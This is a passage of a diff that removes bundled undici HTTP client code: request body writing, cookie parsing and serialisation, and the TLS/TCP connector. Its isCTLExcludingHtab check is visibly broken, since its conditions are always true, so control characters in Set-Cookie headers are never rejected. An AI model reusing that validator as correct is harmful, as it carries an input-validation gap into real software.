'latin1') - socket.write(buffer) - socket.uncork() - } - - request.onBodySent(buffer) - request.onRequestSent() - - if (!expectsPayload) { - socket[kReset] = true - } - - resume(client) - } catch (err) { - util.destroy(isH2 ? h2stream : socket, err) - } -} - -async function writeIterable ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { - assert(contentLength !== 0 || client[kRunning] === 0, 'iterator body cannot be pipelined') - - let callback = null - function onDrain () { - if (callback) { - const cb = callback - callback = null - cb() - } - } - - const waitForDrain = () => new Promise((resolve, reject) => { - assert(callback === null) - - if (socket[kError]) { - reject(socket[kError]) - } else { - callback = resolve - } - }) - - if (client[kHTTPConnVersion] === 'h2') { - h2stream - .on('close', onDrain) - .on('drain', onDrain) - - try { - // It's up to the user to somehow abort the async iterable. - for await (const chunk of body) { - if (socket[kError]) { - throw socket[kError] - } - - const res = h2stream.write(chunk) - request.onBodySent(chunk) - if (!res) { - await waitForDrain() - } - } - } catch (err) { - h2stream.destroy(err) - } finally { - request.onRequestSent() - h2stream.end() - h2stream - .off('close', onDrain) - .off('drain', onDrain) - } - - return - } - - socket - .on('close', onDrain) - .on('drain', onDrain) - - const writer = new AsyncWriter({ socket, request, contentLength, client, expectsPayload, header }) - try { - // It's up to the user to somehow abort the async iterable. - for await (const chunk of body) { - if (socket[kError]) { - throw socket[kError] - } - - if (!writer.write(chunk)) { - await waitForDrain() - } - } - - writer.end() - } catch (err) { - writer.destroy(err) - } finally { - socket - .off('close', onDrain) - .off('drain', onDrain) - } -} - -class AsyncWriter { - constructor ({ socket, request, contentLength, client, expectsPayload, header }) { - this.socket = socket - this.request = request - this.contentLength = contentLength - this.client = client - this.bytesWritten = 0 - this.expectsPayload = expectsPayload - this.header = header - - socket[kWriting] = true - } - - write (chunk) { - const { socket, request, contentLength, client, bytesWritten, expectsPayload, header } = this - - if (socket[kError]) { - throw socket[kError] - } - - if (socket.destroyed) { - return false - } - - const len = Buffer.byteLength(chunk) - if (!len) { - return true - } - - // We should defer writing chunks. - if (contentLength !== null && bytesWritten + len > contentLength) { - if (client[kStrictContentLength]) { - throw new RequestContentLengthMismatchError() - } - - process.emitWarning(new RequestContentLengthMismatchError()) - } - - socket.cork() - - if (bytesWritten === 0) { - if (!expectsPayload) { - socket[kReset] = true - } - - if (contentLength === null) { - socket.write(`${header}transfer-encoding: chunked\r\n`, 'latin1') - } else { - socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') - } - } - - if (contentLength === null) { - socket.write(`\r\n${len.toString(16)}\r\n`, 'latin1') - } - - this.bytesWritten += len - - const ret = socket.write(chunk) - - socket.uncork() - - request.onBodySent(chunk) - - if (!ret) { - if (socket[kParser].timeout && socket[kParser].timeoutType === TIMEOUT_HEADERS) { - // istanbul ignore else: only for jest - if (socket[kParser].timeout.refresh) { - socket[kParser].timeout.refresh() - } - } - } - - return ret - } - - end () { - const { socket, contentLength, client, bytesWritten, expectsPayload, header, request } = this - request.onRequestSent() - - socket[kWriting] = false - - if (socket[kError]) { - throw socket[kError] - } - - if (socket.destroyed) { - return - } - - if (bytesWritten === 0) { - if (expectsPayload) { - // https://tools.ietf.org/html/rfc7230#section-3.3.2 - // A user agent SHOULD send a Content-Length in a request message when - // no Transfer-Encoding is sent and the request method defines a meaning - // for an enclosed payload body. - - socket.write(`${header}content-length: 0\r\n\r\n`, 'latin1') - } else { - socket.write(`${header}\r\n`, 'latin1') - } - } else if (contentLength === null) { - socket.write('\r\n0\r\n\r\n', 'latin1') - } - - if (contentLength !== null && bytesWritten !== contentLength) { - if (client[kStrictContentLength]) { - throw new RequestContentLengthMismatchError() - } else { - process.emitWarning(new RequestContentLengthMismatchError()) - } - } - - if (socket[kParser].timeout && socket[kParser].timeoutType === TIMEOUT_HEADERS) { - // istanbul ignore else: only for jest - if (socket[kParser].timeout.refresh) { - socket[kParser].timeout.refresh() - } - } - - resume(client) - } - - destroy (err) { - const { socket, client } = this - - socket[kWriting] = false - - if (err) { - assert(client[kRunning] <= 1, 'pipeline should only contain this request') - util.destroy(socket, err) - } - } -} - -function errorRequest (client, request, err) { - try { - request.onError(err) - assert(request.aborted) - } catch (err) { - client.emit('error', err) - } -} - -module.exports = Client - - -/***/ }), - -/***/ 6436: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -/* istanbul ignore file: only for Node 12 */ - -const { kConnected, kSize } = __nccwpck_require__(2785) - -class CompatWeakRef { - constructor (value) { - this.value = value - } - - deref () { - return this.value[kConnected] === 0 && this.value[kSize] === 0 - ? undefined - : this.value - } -} - -class CompatFinalizer { - constructor (finalizer) { - this.finalizer = finalizer - } - - register (dispatcher, key) { - if (dispatcher.on) { - dispatcher.on('disconnect', () => { - if (dispatcher[kConnected] === 0 && dispatcher[kSize] === 0) { - this.finalizer(key) - } - }) - } - } -} - -module.exports = function () { - // FIXME: remove workaround when the Node bug is fixed - // https://github.com/nodejs/node/issues/49344#issuecomment-1741776308 - if (process.env.NODE_V8_COVERAGE) { - return { - WeakRef: CompatWeakRef, - FinalizationRegistry: CompatFinalizer - } - } - return { - WeakRef: global.WeakRef || CompatWeakRef, - FinalizationRegistry: global.FinalizationRegistry || CompatFinalizer - } -} - - -/***/ }), - -/***/ 663: -/***/ ((module) => { - -"use strict"; - - -// https://wicg.github.io/cookie-store/#cookie-maximum-attribute-value-size -const maxAttributeValueSize = 1024 - -// https://wicg.github.io/cookie-store/#cookie-maximum-name-value-pair-size -const maxNameValuePairSize = 4096 - -module.exports = { - maxAttributeValueSize, - maxNameValuePairSize -} - - -/***/ }), - -/***/ 1724: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { parseSetCookie } = __nccwpck_require__(4408) -const { stringify, getHeadersList } = __nccwpck_require__(3121) -const { webidl } = __nccwpck_require__(1744) -const { Headers } = __nccwpck_require__(554) - -/** - * @typedef {Object} Cookie - * @property {string} name - * @property {string} value - * @property {Date|number|undefined} expires - * @property {number|undefined} maxAge - * @property {string|undefined} domain - * @property {string|undefined} path - * @property {boolean|undefined} secure - * @property {boolean|undefined} httpOnly - * @property {'Strict'|'Lax'|'None'} sameSite - * @property {string[]} unparsed - */ - -/** - * @param {Headers} headers - * @returns {Record} - */ -function getCookies (headers) { - webidl.argumentLengthCheck(arguments, 1, { header: 'getCookies' }) - - webidl.brandCheck(headers, Headers, { strict: false }) - - const cookie = headers.get('cookie') - const out = {} - - if (!cookie) { - return out - } - - for (const piece of cookie.split(';')) { - const [name, ...value] = piece.split('=') - - out[name.trim()] = value.join('=') - } - - return out -} - -/** - * @param {Headers} headers - * @param {string} name - * @param {{ path?: string, domain?: string }|undefined} attributes - * @returns {void} - */ -function deleteCookie (headers, name, attributes) { - webidl.argumentLengthCheck(arguments, 2, { header: 'deleteCookie' }) - - webidl.brandCheck(headers, Headers, { strict: false }) - - name = webidl.converters.DOMString(name) - attributes = webidl.converters.DeleteCookieAttributes(attributes) - - // Matches behavior of - // https://github.com/denoland/deno_std/blob/63827b16330b82489a04614027c33b7904e08be5/http/cookie.ts#L278 - setCookie(headers, { - name, - value: '', - expires: new Date(0), - ...attributes - }) -} - -/** - * @param {Headers} headers - * @returns {Cookie[]} - */ -function getSetCookies (headers) { - webidl.argumentLengthCheck(arguments, 1, { header: 'getSetCookies' }) - - webidl.brandCheck(headers, Headers, { strict: false }) - - const cookies = getHeadersList(headers).cookies - - if (!cookies) { - return [] - } - - // In older versions of undici, cookies is a list of name:value. - return cookies.map((pair) => parseSetCookie(Array.isArray(pair) ? pair[1] : pair)) -} - -/** - * @param {Headers} headers - * @param {Cookie} cookie - * @returns {void} - */ -function setCookie (headers, cookie) { - webidl.argumentLengthCheck(arguments, 2, { header: 'setCookie' }) - - webidl.brandCheck(headers, Headers, { strict: false }) - - cookie = webidl.converters.Cookie(cookie) - - const str = stringify(cookie) - - if (str) { - headers.append('Set-Cookie', stringify(cookie)) - } -} - -webidl.converters.DeleteCookieAttributes = webidl.dictionaryConverter([ - { - converter: webidl.nullableConverter(webidl.converters.DOMString), - key: 'path', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.DOMString), - key: 'domain', - defaultValue: null - } -]) - -webidl.converters.Cookie = webidl.dictionaryConverter([ - { - converter: webidl.converters.DOMString, - key: 'name' - }, - { - converter: webidl.converters.DOMString, - key: 'value' - }, - { - converter: webidl.nullableConverter((value) => { - if (typeof value === 'number') { - return webidl.converters['unsigned long long'](value) - } - - return new Date(value) - }), - key: 'expires', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters['long long']), - key: 'maxAge', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.DOMString), - key: 'domain', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.DOMString), - key: 'path', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.boolean), - key: 'secure', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.boolean), - key: 'httpOnly', - defaultValue: null - }, - { - converter: webidl.converters.USVString, - key: 'sameSite', - allowedValues: ['Strict', 'Lax', 'None'] - }, - { - converter: webidl.sequenceConverter(webidl.converters.DOMString), - key: 'unparsed', - defaultValue: [] - } -]) - -module.exports = { - getCookies, - deleteCookie, - getSetCookies, - setCookie -} - - -/***/ }), - -/***/ 4408: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { maxNameValuePairSize, maxAttributeValueSize } = __nccwpck_require__(663) -const { isCTLExcludingHtab } = __nccwpck_require__(3121) -const { collectASequenceOfCodePointsFast } = __nccwpck_require__(685) -const assert = __nccwpck_require__(9491) - -/** - * @description Parses the field-value attributes of a set-cookie header string. - * @see https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4 - * @param {string} header - * @returns if the header is invalid, null will be returned - */ -function parseSetCookie (header) { - // 1. If the set-cookie-string contains a %x00-08 / %x0A-1F / %x7F - // character (CTL characters excluding HTAB): Abort these steps and - // ignore the set-cookie-string entirely. - if (isCTLExcludingHtab(header)) { - return null - } - - let nameValuePair = '' - let unparsedAttributes = '' - let name = '' - let value = '' - - // 2. If the set-cookie-string contains a %x3B (";") character: - if (header.includes(';')) { - // 1. The name-value-pair string consists of the characters up to, - // but not including, the first %x3B (";"), and the unparsed- - // attributes consist of the remainder of the set-cookie-string - // (including the %x3B (";") in question). - const position = { position: 0 } - - nameValuePair = collectASequenceOfCodePointsFast(';', header, position) - unparsedAttributes = header.slice(position.position) - } else { - // Otherwise: - - // 1. The name-value-pair string consists of all the characters - // contained in the set-cookie-string, and the unparsed- - // attributes is the empty string. - nameValuePair = header - } - - // 3. If the name-value-pair string lacks a %x3D ("=") character, then - // the name string is empty, and the value string is the value of - // name-value-pair. - if (!nameValuePair.includes('=')) { - value = nameValuePair - } else { - // Otherwise, the name string consists of the characters up to, but - // not including, the first %x3D ("=") character, and the (possibly - // empty) value string consists of the characters after the first - // %x3D ("=") character. - const position = { position: 0 } - name = collectASequenceOfCodePointsFast( - '=', - nameValuePair, - position - ) - value = nameValuePair.slice(position.position + 1) - } - - // 4. Remove any leading or trailing WSP characters from the name - // string and the value string. - name = name.trim() - value = value.trim() - - // 5. If the sum of the lengths of the name string and the value string - // is more than 4096 octets, abort these steps and ignore the set- - // cookie-string entirely. - if (name.length + value.length > maxNameValuePairSize) { - return null - } - - // 6. The cookie-name is the name string, and the cookie-value is the - // value string. - return { - name, value, ...parseUnparsedAttributes(unparsedAttributes) - } -} - -/** - * Parses the remaining attributes of a set-cookie header - * @see https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4 - * @param {string} unparsedAttributes - * @param {[Object.]={}} cookieAttributeList - */ -function parseUnparsedAttributes (unparsedAttributes, cookieAttributeList = {}) { - // 1. If the unparsed-attributes string is empty, skip the rest of - // these steps. - if (unparsedAttributes.length === 0) { - return cookieAttributeList - } - - // 2. Discard the first character of the unparsed-attributes (which - // will be a %x3B (";") character). - assert(unparsedAttributes[0] === ';') - unparsedAttributes = unparsedAttributes.slice(1) - - let cookieAv = '' - - // 3. If the remaining unparsed-attributes contains a %x3B (";") - // character: - if (unparsedAttributes.includes(';')) { - // 1. Consume the characters of the unparsed-attributes up to, but - // not including, the first %x3B (";") character. - cookieAv = collectASequenceOfCodePointsFast( - ';', - unparsedAttributes, - { position: 0 } - ) - unparsedAttributes = unparsedAttributes.slice(cookieAv.length) - } else { - // Otherwise: - - // 1. Consume the remainder of the unparsed-attributes. - cookieAv = unparsedAttributes - unparsedAttributes = '' - } - - // Let the cookie-av string be the characters consumed in this step. - - let attributeName = '' - let attributeValue = '' - - // 4. If the cookie-av string contains a %x3D ("=") character: - if (cookieAv.includes('=')) { - // 1. The (possibly empty) attribute-name string consists of the - // characters up to, but not including, the first %x3D ("=") - // character, and the (possibly empty) attribute-value string - // consists of the characters after the first %x3D ("=") - // character. - const position = { position: 0 } - - attributeName = collectASequenceOfCodePointsFast( - '=', - cookieAv, - position - ) - attributeValue = cookieAv.slice(position.position + 1) - } else { - // Otherwise: - - // 1. The attribute-name string consists of the entire cookie-av - // string, and the attribute-value string is empty. - attributeName = cookieAv - } - - // 5. Remove any leading or trailing WSP characters from the attribute- - // name string and the attribute-value string. - attributeName = attributeName.trim() - attributeValue = attributeValue.trim() - - // 6. If the attribute-value is longer than 1024 octets, ignore the - // cookie-av string and return to Step 1 of this algorithm. - if (attributeValue.length > maxAttributeValueSize) { - return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) - } - - // 7. Process the attribute-name and attribute-value according to the - // requirements in the following subsections. (Notice that - // attributes with unrecognized attribute-names are ignored.) - const attributeNameLowercase = attributeName.toLowerCase() - - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.1 - // If the attribute-name case-insensitively matches the string - // "Expires", the user agent MUST process the cookie-av as follows. - if (attributeNameLowercase === 'expires') { - // 1. Let the expiry-time be the result of parsing the attribute-value - // as cookie-date (see Section 5.1.1). - const expiryTime = new Date(attributeValue) - - // 2. If the attribute-value failed to parse as a cookie date, ignore - // the cookie-av. - - cookieAttributeList.expires = expiryTime - } else if (attributeNameLowercase === 'max-age') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.2 - // If the attribute-name case-insensitively matches the string "Max- - // Age", the user agent MUST process the cookie-av as follows. - - // 1. If the first character of the attribute-value is not a DIGIT or a - // "-" character, ignore the cookie-av. - const charCode = attributeValue.charCodeAt(0) - - if ((charCode < 48 || charCode > 57) && attributeValue[0] !== '-') { - return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) - } - - // 2. If the remainder of attribute-value contains a non-DIGIT - // character, ignore the cookie-av. - if (!/^\d+$/.test(attributeValue)) { - return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) - } - - // 3. Let delta-seconds be the attribute-value converted to an integer. - const deltaSeconds = Number(attributeValue) - - // 4. Let cookie-age-limit be the maximum age of the cookie (which - // SHOULD be 400 days or less, see Section 4.1.2.2). - - // 5. Set delta-seconds to the smaller of its present value and cookie- - // age-limit. - // deltaSeconds = Math.min(deltaSeconds * 1000, maxExpiresMs) - - // 6. If delta-seconds is less than or equal to zero (0), let expiry- - // time be the earliest representable date and time. Otherwise, let - // the expiry-time be the current date and time plus delta-seconds - // seconds. - // const expiryTime = deltaSeconds <= 0 ? Date.now() : Date.now() + deltaSeconds - - // 7. Append an attribute to the cookie-attribute-list with an - // attribute-name of Max-Age and an attribute-value of expiry-time. - cookieAttributeList.maxAge = deltaSeconds - } else if (attributeNameLowercase === 'domain') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.3 - // If the attribute-name case-insensitively matches the string "Domain", - // the user agent MUST process the cookie-av as follows. - - // 1. Let cookie-domain be the attribute-value. - let cookieDomain = attributeValue - - // 2. If cookie-domain starts with %x2E ("."), let cookie-domain be - // cookie-domain without its leading %x2E ("."). - if (cookieDomain[0] === '.') { - cookieDomain = cookieDomain.slice(1) - } - - // 3. Convert the cookie-domain to lower case. - cookieDomain = cookieDomain.toLowerCase() - - // 4. Append an attribute to the cookie-attribute-list with an - // attribute-name of Domain and an attribute-value of cookie-domain. - cookieAttributeList.domain = cookieDomain - } else if (attributeNameLowercase === 'path') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.4 - // If the attribute-name case-insensitively matches the string "Path", - // the user agent MUST process the cookie-av as follows. - - // 1. If the attribute-value is empty or if the first character of the - // attribute-value is not %x2F ("/"): - let cookiePath = '' - if (attributeValue.length === 0 || attributeValue[0] !== '/') { - // 1. Let cookie-path be the default-path. - cookiePath = '/' - } else { - // Otherwise: - - // 1. Let cookie-path be the attribute-value. - cookiePath = attributeValue - } - - // 2. Append an attribute to the cookie-attribute-list with an - // attribute-name of Path and an attribute-value of cookie-path. - cookieAttributeList.path = cookiePath - } else if (attributeNameLowercase === 'secure') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.5 - // If the attribute-name case-insensitively matches the string "Secure", - // the user agent MUST append an attribute to the cookie-attribute-list - // with an attribute-name of Secure and an empty attribute-value. - - cookieAttributeList.secure = true - } else if (attributeNameLowercase === 'httponly') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.6 - // If the attribute-name case-insensitively matches the string - // "HttpOnly", the user agent MUST append an attribute to the cookie- - // attribute-list with an attribute-name of HttpOnly and an empty - // attribute-value. - - cookieAttributeList.httpOnly = true - } else if (attributeNameLowercase === 'samesite') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.7 - // If the attribute-name case-insensitively matches the string - // "SameSite", the user agent MUST process the cookie-av as follows: - - // 1. Let enforcement be "Default". - let enforcement = 'Default' - - const attributeValueLowercase = attributeValue.toLowerCase() - // 2. If cookie-av's attribute-value is a case-insensitive match for - // "None", set enforcement to "None". - if (attributeValueLowercase.includes('none')) { - enforcement = 'None' - } - - // 3. If cookie-av's attribute-value is a case-insensitive match for - // "Strict", set enforcement to "Strict". - if (attributeValueLowercase.includes('strict')) { - enforcement = 'Strict' - } - - // 4. If cookie-av's attribute-value is a case-insensitive match for - // "Lax", set enforcement to "Lax". - if (attributeValueLowercase.includes('lax')) { - enforcement = 'Lax' - } - - // 5. Append an attribute to the cookie-attribute-list with an - // attribute-name of "SameSite" and an attribute-value of - // enforcement. - cookieAttributeList.sameSite = enforcement - } else { - cookieAttributeList.unparsed ??= [] - - cookieAttributeList.unparsed.push(`${attributeName}=${attributeValue}`) - } - - // 8. Return to Step 1 of this algorithm. - return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) -} - -module.exports = { - parseSetCookie, - parseUnparsedAttributes -} - - -/***/ }), - -/***/ 3121: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const assert = __nccwpck_require__(9491) -const { kHeadersList } = __nccwpck_require__(2785) - -function isCTLExcludingHtab (value) { - if (value.length === 0) { - return false - } - - for (const char of value) { - const code = char.charCodeAt(0) - - if ( - (code >= 0x00 || code <= 0x08) || - (code >= 0x0A || code <= 0x1F) || - code === 0x7F - ) { - return false - } - } -} - -/** - CHAR = - token = 1* - separators = "(" | ")" | "<" | ">" | "@" - | "," | ";" | ":" | "\" | <"> - | "/" | "[" | "]" | "?" | "=" - | "{" | "}" | SP | HT - * @param {string} name - */ -function validateCookieName (name) { - for (const char of name) { - const code = char.charCodeAt(0) - - if ( - (code <= 0x20 || code > 0x7F) || - char === '(' || - char === ')' || - char === '>' || - char === '<' || - char === '@' || - char === ',' || - char === ';' || - char === ':' || - char === '\\' || - char === '"' || - char === '/' || - char === '[' || - char === ']' || - char === '?' || - char === '=' || - char === '{' || - char === '}' - ) { - throw new Error('Invalid cookie name') - } - } -} - -/** - cookie-value = *cookie-octet / ( DQUOTE *cookie-octet DQUOTE ) - cookie-octet = %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E - ; US-ASCII characters excluding CTLs, - ; whitespace DQUOTE, comma, semicolon, - ; and backslash - * @param {string} value - */ -function validateCookieValue (value) { - for (const char of value) { - const code = char.charCodeAt(0) - - if ( - code < 0x21 || // exclude CTLs (0-31) - code === 0x22 || - code === 0x2C || - code === 0x3B || - code === 0x5C || - code > 0x7E // non-ascii - ) { - throw new Error('Invalid header value') - } - } -} - -/** - * path-value = - * @param {string} path - */ -function validateCookiePath (path) { - for (const char of path) { - const code = char.charCodeAt(0) - - if (code < 0x21 || char === ';') { - throw new Error('Invalid cookie path') - } - } -} - -/** - * I have no idea why these values aren't allowed to be honest, - * but Deno tests these. - Khafra - * @param {string} domain - */ -function validateCookieDomain (domain) { - if ( - domain.startsWith('-') || - domain.endsWith('.') || - domain.endsWith('-') - ) { - throw new Error('Invalid cookie domain') - } -} - -/** - * @see https://www.rfc-editor.org/rfc/rfc7231#section-7.1.1.1 - * @param {number|Date} date - IMF-fixdate = day-name "," SP date1 SP time-of-day SP GMT - ; fixed length/zone/capitalization subset of the format - ; see Section 3.3 of [RFC5322] - - day-name = %x4D.6F.6E ; "Mon", case-sensitive - / %x54.75.65 ; "Tue", case-sensitive - / %x57.65.64 ; "Wed", case-sensitive - / %x54.68.75 ; "Thu", case-sensitive - / %x46.72.69 ; "Fri", case-sensitive - / %x53.61.74 ; "Sat", case-sensitive - / %x53.75.6E ; "Sun", case-sensitive - date1 = day SP month SP year - ; e.g., 02 Jun 1982 - - day = 2DIGIT - month = %x4A.61.6E ; "Jan", case-sensitive - / %x46.65.62 ; "Feb", case-sensitive - / %x4D.61.72 ; "Mar", case-sensitive - / %x41.70.72 ; "Apr", case-sensitive - / %x4D.61.79 ; "May", case-sensitive - / %x4A.75.6E ; "Jun", case-sensitive - / %x4A.75.6C ; "Jul", case-sensitive - / %x41.75.67 ; "Aug", case-sensitive - / %x53.65.70 ; "Sep", case-sensitive - / %x4F.63.74 ; "Oct", case-sensitive - / %x4E.6F.76 ; "Nov", case-sensitive - / %x44.65.63 ; "Dec", case-sensitive - year = 4DIGIT - - GMT = %x47.4D.54 ; "GMT", case-sensitive - - time-of-day = hour ":" minute ":" second - ; 00:00:00 - 23:59:60 (leap second) - - hour = 2DIGIT - minute = 2DIGIT - second = 2DIGIT - */ -function toIMFDate (date) { - if (typeof date === 'number') { - date = new Date(date) - } - - const days = [ - 'Sun', 'Mon', 'Tue', 'Wed', - 'Thu', 'Fri', 'Sat' - ] - - const months = [ - 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', - 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec' - ] - - const dayName = days[date.getUTCDay()] - const day = date.getUTCDate().toString().padStart(2, '0') - const month = months[date.getUTCMonth()] - const year = date.getUTCFullYear() - const hour = date.getUTCHours().toString().padStart(2, '0') - const minute = date.getUTCMinutes().toString().padStart(2, '0') - const second = date.getUTCSeconds().toString().padStart(2, '0') - - return `${dayName}, ${day} ${month} ${year} ${hour}:${minute}:${second} GMT` -} - -/** - max-age-av = "Max-Age=" non-zero-digit *DIGIT - ; In practice, both expires-av and max-age-av - ; are limited to dates representable by the - ; user agent. - * @param {number} maxAge - */ -function validateCookieMaxAge (maxAge) { - if (maxAge < 0) { - throw new Error('Invalid cookie max-age') - } -} - -/** - * @see https://www.rfc-editor.org/rfc/rfc6265#section-4.1.1 - * @param {import('./index').Cookie} cookie - */ -function stringify (cookie) { - if (cookie.name.length === 0) { - return null - } - - validateCookieName(cookie.name) - validateCookieValue(cookie.value) - - const out = [`${cookie.name}=${cookie.value}`] - - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-cookie-prefixes-00#section-3.1 - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-cookie-prefixes-00#section-3.2 - if (cookie.name.startsWith('__Secure-')) { - cookie.secure = true - } - - if (cookie.name.startsWith('__Host-')) { - cookie.secure = true - cookie.domain = null - cookie.path = '/' - } - - if (cookie.secure) { - out.push('Secure') - } - - if (cookie.httpOnly) { - out.push('HttpOnly') - } - - if (typeof cookie.maxAge === 'number') { - validateCookieMaxAge(cookie.maxAge) - out.push(`Max-Age=${cookie.maxAge}`) - } - - if (cookie.domain) { - validateCookieDomain(cookie.domain) - out.push(`Domain=${cookie.domain}`) - } - - if (cookie.path) { - validateCookiePath(cookie.path) - out.push(`Path=${cookie.path}`) - } - - if (cookie.expires && cookie.expires.toString() !== 'Invalid Date') { - out.push(`Expires=${toIMFDate(cookie.expires)}`) - } - - if (cookie.sameSite) { - out.push(`SameSite=${cookie.sameSite}`) - } - - for (const part of cookie.unparsed) { - if (!part.includes('=')) { - throw new Error('Invalid unparsed') - } - - const [key, ...value] = part.split('=') - - out.push(`${key.trim()}=${value.join('=')}`) - } - - return out.join('; ') -} - -let kHeadersListNode - -function getHeadersList (headers) { - if (headers[kHeadersList]) { - return headers[kHeadersList] - } - - if (!kHeadersListNode) { - kHeadersListNode = Object.getOwnPropertySymbols(headers).find( - (symbol) => symbol.description === 'headers list' - ) - - assert(kHeadersListNode, 'Headers cannot be parsed') - } - - const headersList = headers[kHeadersListNode] - assert(headersList) - - return headersList -} - -module.exports = { - isCTLExcludingHtab, - stringify, - getHeadersList -} - - -/***/ }), - -/***/ 2067: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const net = __nccwpck_require__(1808) -const assert = __nccwpck_require__(9491) -const util = __nccwpck_require__(3983) -const { InvalidArgumentError, ConnectTimeoutError } = __nccwpck_require__(8045) - -let tls // include tls conditionally since it is not always available - -// TODO: session re-use does not wait for the first -// connection to resolve the session and might therefore -// resolve the same servername multiple times even when -// re-use is enabled. - -let SessionCache -// FIXME: remove workaround when the Node bug is fixed -// https://github.com/nodejs/node/issues/49344#issuecomment-1741776308 -if (global.FinalizationRegistry && !process.env.NODE_V8_COVERAGE) { - SessionCache = class WeakSessionCache { - constructor (maxCachedSessions) { - this._maxCachedSessions = maxCachedSessions - this._sessionCache = new Map() - this._sessionRegistry = new global.FinalizationRegistry((key) => { - if (this._sessionCache.size < this._maxCachedSessions) { - return - } - - const ref = this._sessionCache.get(key) - if (ref !== undefined && ref.deref() === undefined) { - this._sessionCache.delete(key) - } - }) - } - - get (sessionKey) { - const ref = this._sessionCache.get(sessionKey) - return ref ? ref.deref() : null - } - - set (sessionKey, session) { - if (this._maxCachedSessions === 0) { - return - } - - this._sessionCache.set(sessionKey, new WeakRef(session)) - this._sessionRegistry.register(session, sessionKey) - } - } -} else { - SessionCache = class SimpleSessionCache { - constructor (maxCachedSessions) { - this._maxCachedSessions = maxCachedSessions - this._sessionCache = new Map() - } - - get (sessionKey) { - return this._sessionCache.get(sessionKey) - } - - set (sessionKey, session) { - if (this._maxCachedSessions === 0) { - return - } - - if (this._sessionCache.size >= this._maxCachedSessions) { - // remove the oldest session - const { value: oldestKey } = this._sessionCache.keys().next() - this._sessionCache.delete(oldestKey) - } - - this._sessionCache.set(sessionKey, session) - } - } -} - -function buildConnector ({ allowH2, maxCachedSessions, socketPath, timeout, ...opts }) { - if (maxCachedSessions != null && (!Number.isInteger(maxCachedSessions) || maxCachedSessions < 0)) { - throw new InvalidArgumentError('maxCachedSessions must be a positive integer or zero') - } - - const options = { path: socketPath, ...opts } - const sessionCache = new SessionCache(maxCachedSessions == null ? 100 : maxCachedSessions) - timeout = timeout == null ? 10e3 : timeout - allowH2 = allowH2 != null ? allowH2 : false - return function connect ({ hostname, host, protocol, port, servername, localAddress, httpSocket }, callback) { - let socket - if (protocol === 'https:') { - if (!tls) { - tls = __nccwpck_require__(4404) - } - servername = servername || options.servername || util.getServerName(host) || null - - const sessionKey = servername || hostname - const session = sessionCache.get(sessionKey) || null - - assert(sessionKey) - - socket = tls.connect({ - highWaterMark: 16384, // TLS in node can't have bigger HWM anyway... - ...options, - servername, - session, - localAddress, - // TODO(HTTP/2): Add support for h2c - ALPNProtocols: allowH2 ? ['http/1.1', 'h2'] : ['http/1.1'], - socket: httpSocket, // upgrade socket connection - port: port || 443, - host: hostname - }) - - socket - .on('session', function (session) { - // TODO (fix): Can a session become invalid once established? Don't think so? - sessionCache.set(sessionKey, session) - }) - } else { - assert(!httpSocket, 'httpSocket can only be sent on TLS update') - socket = net.connect({ - highWaterMark: 64 * 1024, // Same as nodejs fs streams. - ...options, - localAddress, - port: port || 80, - host: hostname - }) - } - - // Set TCP keep alive options on the socket here instead of in connect() for the case of assigning the socket - if (options.keepAlive == null || options.keepAlive) { - const keepAliveInitialDelay = options.keepAliveInitialDelay === undefined ? 60e3 : options.keepAliveInitialDelay - socket.setKeepAlive(true, keepAliveInitialDelay) - } - - const cancelTimeout = setupTimeout(() => onConnectTimeout(socket), timeout) - - socket - .setNoDelay(true) - .once(protocol === 'https:' ? 'secureConnect' : 'connect', function () { - cancelTimeout() - - if (callback) { - const cb = callback - callback = null - cb(null, this) - } - }) - .on('error', function (err) { - cancelTimeout() - - if (callback) { - const cb = callback - callback = null - cb(err) - } - }) - - return socket - } -} - -function setupTimeout (onConnectTimeout, timeout) { - if (!timeout) { - return () => {} - } - - let s1 = null - let s2 = null - const timeoutId = setTimeout(() => { - // setImmediate is added to make sure that we priotorise socket error events over timeouts - s1 = setImmediate(() => { - if (process.platform === 'win32') { - // Windows needs an extra setImmediate probably due to implementation differences in the socket logic - s2 = setImmediate(() => onConnectTimeout()) - } else { - onConnectTimeout() - } - }) - }, timeout) - return () => { - clearTimeout(timeoutId) - clearImmediate(s1) - clearImmediate(s2) - } -} - -function onConnectTimeout (socket) { - util.destroy(socket, new ConnectTimeoutError()) -} - -module.exports = buildConnector - - -/***/ }), - -/***/ 8045: -/***/ 